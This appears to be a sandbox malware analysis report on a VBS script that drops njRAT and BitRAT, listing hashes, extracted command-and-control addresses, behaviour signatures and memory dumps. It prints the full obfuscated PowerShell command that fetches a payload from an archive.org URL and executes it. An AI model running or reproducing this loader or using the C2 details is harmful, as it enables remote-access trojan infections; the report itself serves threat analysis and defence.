Overview

overview

10

Static

static

1

03e4a5b246...b5.vbs

windows7-x64

10

03e4a5b246...b5.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    146s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231222-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system
  • submitted
    29-12-2023 21:01

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    03e4a5b246180743a15aabbe28f2acb5.vbs

  • Size

    1KB

  • MD5

    03e4a5b246180743a15aabbe28f2acb5

  • SHA1

    36caf7a27c4eb6c30557737ea50b8e47e32e07a9

  • SHA256

    03674af9c28f5702955756f95a9173954188deb1d4f14b0bc8f0457e9383d6db

  • SHA512

    3cd8706b9105cd1a71d95142eb62df9f39601a7752648ce47583d1b8715f89c0d839e161730ef1d77becb7b9f0edae6ff353394046fa7e9901f9e06bbf291996

Score
10/10
bitratnjrathackedpersistencetrojanupx

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://ia601506.us.archive.org/27/items/bypass_202108/bypass.txt

Extracted

Family

njrat

Version

v4.0

Botnet

HacKed

C2

13.77.222.211:7827

Mutex

Windows

Attributes
  • reg_key

    Windows

  • splitter

    |-F-|

Extracted

Family

bitrat

Version

1.38

C2

20.194.35.6:7904

Attributes
  • communication_password

    202cb962ac59075b964b07152d234b70

  • install_dir

    Appdata

  • install_file

    Google.exe

  • tor_process

    tor

Signatures

  • BitRAT

    BitRAT is a remote access tool written in C++ and uses leaked source code from other families.

    trojanbitrat
  • njRAT/Bladabindi

    Widely used RAT written in .NET.

    trojannjrat
  • Blocklisted process makes network request 3 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • UPX packed file 20 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Adds Run key to start application 2 TTPs 3 IoCs
    persistence
  • Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 25 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 17 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\03e4a5b246180743a15aabbe28f2acb5.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4076
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $TRUMP ='https://ia601506.us.archive.org/27/items/bypass_202108/bypass.txt';$B ='ETH COINt.WTF COINlIOSNT'.RePlace('ETH COIN','nE').RepLace('TF COIN','EbC').RepLace('OS','e');$CC = 'DOS COIN LSOSCOINnG'.RepLace('S COIN ','Wn').RepLace('SO','oaD').RepLace('COIN','TrI');$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.RepLace('os COIN','X(n`e').RepLace('BTC COIN','-Ob').RepLace('TH COIN','`c`T');&('I'+'EX')($A -Join '')|&('I'+'EX');
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1940
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:5168
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        3⤵
        • Adds Run key to start application
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        PID:3032

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ohecfmss.knf.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • memory/1940-15-0x00007FFE7D750000-0x00007FFE7E211000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/1940-16-0x0000028FDBFF0000-0x0000028FDC000000-memory.dmp

    Filesize

    64KB

    Download

  • memory/1940-11-0x0000028FDBFF0000-0x0000028FDC000000-memory.dmp

    Filesize

    64KB

    Download

  • memory/1940-12-0x0000028FDBFF0000-0x0000028FDC000000-memory.dmp

    Filesize

    64KB

    Download

  • memory/1940-13-0x0000028FDBFF0000-0x0000028FDC000000-memory.dmp

    Filesize

    64KB

    Download

  • memory/1940-27-0x0000028FDC020000-0x0000028FDC036000-memory.dmp

    Filesize

    88KB

    Download

  • memory/1940-17-0x0000028FDBFF0000-0x0000028FDC000000-memory.dmp

    Filesize

    64KB

    Download

  • memory/1940-10-0x00007FFE7D750000-0x00007FFE7E211000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/1940-18-0x0000028FDBFF0000-0x0000028FDC000000-memory.dmp

    Filesize

    64KB

    Download

  • memory/1940-19-0x0000028FDBFE0000-0x0000028FDBFF6000-memory.dmp

    Filesize

    88KB

    Download

  • memory/1940-20-0x0000028FDBFF0000-0x0000028FDC000000-memory.dmp

    Filesize

    64KB

    Download

  • memory/1940-1-0x0000028FDC030000-0x0000028FDC052000-memory.dmp

    Filesize

    136KB

    Download

  • memory/1940-36-0x00007FFE7D750000-0x00007FFE7E211000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/1940-33-0x0000028FF6AE0000-0x0000028FF6AF6000-memory.dmp

    Filesize

    88KB

    Download

  • memory/3032-32-0x0000000000400000-0x00000000007E4000-memory.dmp

    Filesize

    3.9MB

    Download

  • memory/3032-41-0x0000000000400000-0x00000000007E4000-memory.dmp

    Filesize

    3.9MB

    Download

  • memory/3032-28-0x0000000000400000-0x00000000007E4000-memory.dmp

    Filesize

    3.9MB

    Download

  • memory/3032-30-0x0000000000400000-0x00000000007E4000-memory.dmp

    Filesize

    3.9MB

    Download

  • memory/3032-59-0x0000000000400000-0x00000000007E4000-memory.dmp

    Filesize

    3.9MB

    Download

  • memory/3032-53-0x0000000000400000-0x00000000007E4000-memory.dmp

    Filesize

    3.9MB

    Download

  • memory/3032-31-0x0000000000400000-0x00000000007E4000-memory.dmp

    Filesize

    3.9MB

    Download

  • memory/3032-60-0x0000000000400000-0x00000000007E4000-memory.dmp

    Filesize

    3.9MB

    Download

  • memory/3032-61-0x0000000070920000-0x0000000070959000-memory.dmp

    Filesize

    228KB

    Download

  • memory/3032-37-0x0000000000400000-0x00000000007E4000-memory.dmp

    Filesize

    3.9MB

    Download

  • memory/3032-38-0x00000000715B0000-0x00000000715E9000-memory.dmp

    Filesize

    228KB

    Download

  • memory/3032-39-0x0000000000400000-0x00000000007E4000-memory.dmp

    Filesize

    3.9MB

    Download

  • memory/3032-40-0x0000000000400000-0x00000000007E4000-memory.dmp

    Filesize

    3.9MB

    Download

  • memory/3032-29-0x0000000000400000-0x00000000007E4000-memory.dmp

    Filesize

    3.9MB

    Download

  • memory/3032-43-0x0000000000400000-0x00000000007E4000-memory.dmp

    Filesize

    3.9MB

    Download

  • memory/3032-44-0x0000000000400000-0x00000000007E4000-memory.dmp

    Filesize

    3.9MB

    Download

  • memory/3032-45-0x0000000000400000-0x00000000007E4000-memory.dmp

    Filesize

    3.9MB

    Download

  • memory/3032-46-0x0000000071270000-0x00000000712A9000-memory.dmp

    Filesize

    228KB

    Download

  • memory/3032-42-0x0000000000400000-0x00000000007E4000-memory.dmp

    Filesize

    3.9MB

    Download

  • memory/3032-58-0x0000000070920000-0x0000000070959000-memory.dmp

    Filesize

    228KB

    Download

  • memory/3032-57-0x0000000000400000-0x00000000007E4000-memory.dmp

    Filesize

    3.9MB

    Download

  • memory/3032-56-0x0000000000400000-0x00000000007E4000-memory.dmp

    Filesize

    3.9MB

    Download

  • memory/3032-52-0x0000000000400000-0x00000000007E4000-memory.dmp

    Filesize

    3.9MB

    Download

  • memory/3032-51-0x0000000000400000-0x00000000007E4000-memory.dmp

    Filesize

    3.9MB

    Download

  • memory/3032-54-0x0000000070920000-0x0000000070959000-memory.dmp

    Filesize

    228KB

    Download

  • memory/5168-21-0x0000000000400000-0x000000000040E000-memory.dmp

    Filesize

    56KB

    Download

  • memory/5168-50-0x00000000749E0000-0x0000000075190000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/5168-55-0x0000000005C70000-0x0000000005C80000-memory.dmp

    Filesize

    64KB

    Download

  • memory/5168-49-0x0000000005CF0000-0x0000000005CFA000-memory.dmp

    Filesize

    40KB

    Download

  • memory/5168-48-0x0000000005D20000-0x0000000005DB2000-memory.dmp

    Filesize

    584KB

    Download

  • memory/5168-47-0x0000000005C70000-0x0000000005C80000-memory.dmp

    Filesize

    64KB

    Download

  • memory/5168-26-0x0000000006230000-0x00000000067D4000-memory.dmp

    Filesize

    5.6MB

    Download

  • memory/5168-23-0x0000000005590000-0x000000000562C000-memory.dmp

    Filesize

    624KB

    Download

  • memory/5168-22-0x00000000749E0000-0x0000000075190000-memory.dmp

    Filesize

    7.7MB

    Download